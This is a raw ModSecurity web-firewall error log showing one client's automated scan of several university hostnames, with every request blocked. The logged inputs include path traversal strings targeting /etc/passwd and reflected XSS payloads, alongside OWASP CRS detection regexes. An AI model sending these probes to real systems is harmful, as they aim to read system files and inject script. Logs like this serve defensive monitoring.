[Tue Aug 29 11:55:39.715611 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16S8Co-f0AAAoz8JQAAAAS"]
[Tue Aug 29 11:55:39.727307 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16S8Co-f0AAAq4fVsAAAAJ"]
[Tue Aug 29 11:55:39.852152 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16S8Co-f0AAAolKt4AAAAe"]
[Tue Aug 29 11:55:39.900764 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16S8Co-f0AAAq5@DQAAAAK"]
[Tue Aug 29 11:55:40.095043 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16TMCo-f0AAApHRkYAAAAP"]
[Tue Aug 29 11:55:40.151706 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16TMCo-f0AAAq5@DkAAAAK"]
[Tue Aug 29 11:55:40.157687 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16TMCo-f0AAApHRkkAAAAP"]
[Tue Aug 29 11:55:40.172204 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16TMCo-f0AAAq5@DoAAAAK"]
[Tue Aug 29 11:55:40.172617 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16TMCo-f0AAAqTvwMAAAAa"]
[Tue Aug 29 11:55:40.848024 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16TMCo-f0AAAolKuMAAAAe"]
[Tue Aug 29 11:55:41.812261 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TcCo-f0AAAolKukAAAAe"]
[Tue Aug 29 11:55:41.813188 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TcCo-f0AAAoz8KEAAAAS"]
[Tue Aug 29 11:55:41.815357 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TcCo-f0AAAqY6GgAAAAr"]
[Tue Aug 29 11:55:41.920897 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TcCo-f0AAAq5@EEAAAAK"]
[Tue Aug 29 11:55:41.967287 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TcCo-f0AAAq5@EMAAAAK"]
[Tue Aug 29 11:55:42.736976 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TsCo-f0AAAqeFZsAAAAx"]
[Tue Aug 29 11:55:43.717129 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16T8Co-f0AAAqqtiIAAAAA"]
[Tue Aug 29 11:55:43.862128 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16T8Co-f0AAAqqtiQAAAAA"]
[Tue Aug 29 11:55:43.864517 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16T8Co-f0AAAqY6HMAAAAr"]
[Tue Aug 29 11:55:43.866340 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16T8Co-f0AAAqeFZ8AAAAx"]
[Tue Aug 29 11:55:43.868823 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16T8Co-f0AAApbUncAAAAh"]
[Tue Aug 29 11:55:43.929689 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16T8Co-f0AAAqqtiYAAAAA"]
[Tue Aug 29 11:55:43.979757 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16T8Co-f0AAAqeFaIAAAAx"]
[Tue Aug 29 11:55:43.980094 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16T8Co-f0AAApbUnkAAAAh"]
[Tue Aug 29 11:55:44.014412 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16UMCo-f0AAAqqtikAAAAA"]
[Tue Aug 29 11:55:44.041148 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16UMCo-f0AAAqSwzEAAAAN"]
[Tue Aug 29 11:55:44.532563 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UMCo-f0AAAqqtioAAAAA"]
